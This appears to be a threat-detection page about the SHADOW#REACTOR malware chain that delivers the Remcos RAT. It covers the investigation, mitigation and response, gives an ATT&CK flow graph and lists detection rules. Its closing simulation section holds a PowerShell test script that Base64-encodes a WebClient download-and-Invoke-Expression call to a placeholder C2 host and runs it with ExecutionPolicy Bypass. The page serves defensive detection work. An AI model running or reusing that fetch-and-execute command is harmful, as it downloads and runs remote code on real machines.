Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
SHADOW#REACTOR is a multi-stage Windows malware chain that combines an obfuscated VBS launcher, a PowerShell-based downloader, text-only staging artifacts, a .NET Reactor–protected loader, and MSBuild execution to ultimately deploy the Remcos remote access trojan (RAT).
Investigation
Researchers reconstructed the flow starting with a VBS script retrieved from attacker infrastructure, followed by PowerShell routines that reassemble and decode staged text payloads. The chain proceeds with reflective, in-memory loading of a .NET assembly and a final handoff to MSBuild, which triggers execution of the Remcos RAT. The write-up documents the text-encoded components, decryption logic, and persistence methods used to maintain access.
Mitigation
Increase monitoring coverage for script hosts and interpreters, and prevent VBS/PowerShell execution from user-writable paths where feasible. Add detections for suspicious outbound HTTP traffic to identified infrastructure, MSBuild misuse, and reflective .NET assembly loading. Monitor for common persistence patterns, including Run-key modifications and shortcut-based startup entries.
Response
If SHADOW#REACTOR activity is confirmed, isolate the endpoint and kill the full process chain (wscript.exe → powershell.exe → msbuild.exe). Remove any staged text files and related registry artifacts, and remediate by deleting Remcos binaries and associated configuration blobs. Follow with a thorough forensic review to scope additional compromise and ensure complete eradication.
"graph TB %% Class Definitions Section classDef technique fill:#ffe699 classDef builtin fill:#cccccc classDef malware fill:#ff9999 %% Node definitions tech_user_execution["<b>Technique</b> – <b>T1204.002 User Execution: Malicious File</b><br/><b>Description</b>: Victim runs a malicious file that launches code."] class tech_user_execution technique tool_wscript["<b>Tool</b> – <b>Name</b>: wscript.exe<br/><b>Description</b>: Windows Script Host used to execute VBScript files."] class tool_wscript builtin tech_vbscript_interp["<b>Technique</b> – <b>T1059.005 Command and Scripting Interpreter: Visual Basic</b><br/><b>Description</b>: Executes Visual Basic scripts on the host system."] class tech_vbscript_interp technique tech_powershell_interp["<b>Technique</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/><b>Description</b>: Runs PowerShell commands and scripts."] class tech_powershell_interp technique tech_http_comm["<b>Technique</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/><b>Description</b>: Uses HTTP/HTTPS to download payload fragments from remote servers."] class tech_http_comm technique tech_obfuscation["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Payload is encoded with Base64, XOR and protected by .NET Reactor."] class tech_obfuscation technique tech_reflective_loading["<b>Technique</b> – <b>T1620 Reflective Code Loading</b> / <b>T1574.014 Hijack Execution Flow: AppDomainManager</b><br/><b>Description</b>: Loads a .NET assembly in memory via AppDomainManager hijacking."] class tech_reflective_loading technique tool_msbuild["<b>Tool</b> – <b>Name</b>: MSBuild.exe<br/><b>Description</b>: Trusted developer utility abused as a LOLBin to launch the final stage."] class tool_msbuild builtin malware_remcos["<b>Malware</b> – <b>Name</b>: Remcos RAT<br/><b>Description</b>: Remote access trojan used for command and control."] class malware_remcos malware tech_shortcut_mod["<b>Technique</b> – <b>T1547.009 Shortcut Modification</b><br/><b>Description</b>: Creates a LNK shortcut in the Startup folder to achieve persistence."] class tech_shortcut_mod technique %% Connections showing attack flow tech_user_execution –>|executes via| tool_wscript tool_wscript –>|runs| tech_vbscript_interp tech_vbscript_interp –>|invokes| tech_powershell_interp tech_powershell_interp –>|downloads fragments via| tech_http_comm tech_http_comm –>|reconstructs payload| tech_obfuscation tech_obfuscation –>|loads in memory via| tech_reflective_loading tech_reflective_loading –>|uses| tool_msbuild tool_msbuild –>|launches| malware_remcos malware_remcos –>|may create| tech_shortcut_mod "
Attack Flow
Detections
LOLBAS WScript / CScript (via process_creation)
View
Suspicious Powershell Strings (via powershell)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Suspicious Files in Public User Profile (via file_event)
View
Suspicious Execution from Public User Profile (via process_creation)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
IOCs (HashSha256) to detect: SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT
View
IOCs (SourceIP) to detect: SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT
View
IOCs (DestinationIP) to detect: SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT
View
Detection of SHADOW#REACTOR Infection Chain [Windows Process Creation]
View
Detection of ExecutionPolicy Bypass and Obfuscated PowerShell Commands [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker with limited lateral movement rights wishes to execute a remote payload on a compromised Windows host while evading typical script‑blocking defenses. They use PowerShell with-ExecutionPolicy Bypassto ignore execution policy restrictions. The malicious payload is obfuscated as a Base64‑encoded string that, when decoded, creates aSystem.Net.WebClientobject to download a PowerShell script from a C2 server and invoke it. This combination satisfies all three detection criteria (ExecutionPolicy Bypass,FromBase64String,System.Net.WebClient). -
Regression Test Script:
#-------------------------------------------- # Simulated malicious PowerShell execution #-------------------------------------------- # 1. Craft a simple remote script (for demo only) $remoteScript = 'Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://{C2_HOST}/payload.ps1")' # 2. Encode the script in Base64 $bytes = [System.Text.Encoding]::Unicode.GetBytes($remoteScript) $b64 = [Convert]::ToBase64String($bytes) # 3. Execute with ExecutionPolicy Bypass and FromBase64String PowerShell -ExecutionPolicy Bypass -Command " $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$b64')); Invoke-Expression $decoded " -
Cleanup Commands:
# Remove any downloaded payloads and stop lingering PowerShell processes Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'ExecutionPolicy Bypass'} | Stop-Process -Force Remove-Item -Path "C:Temppayload.ps1" -ErrorAction SilentlyContinue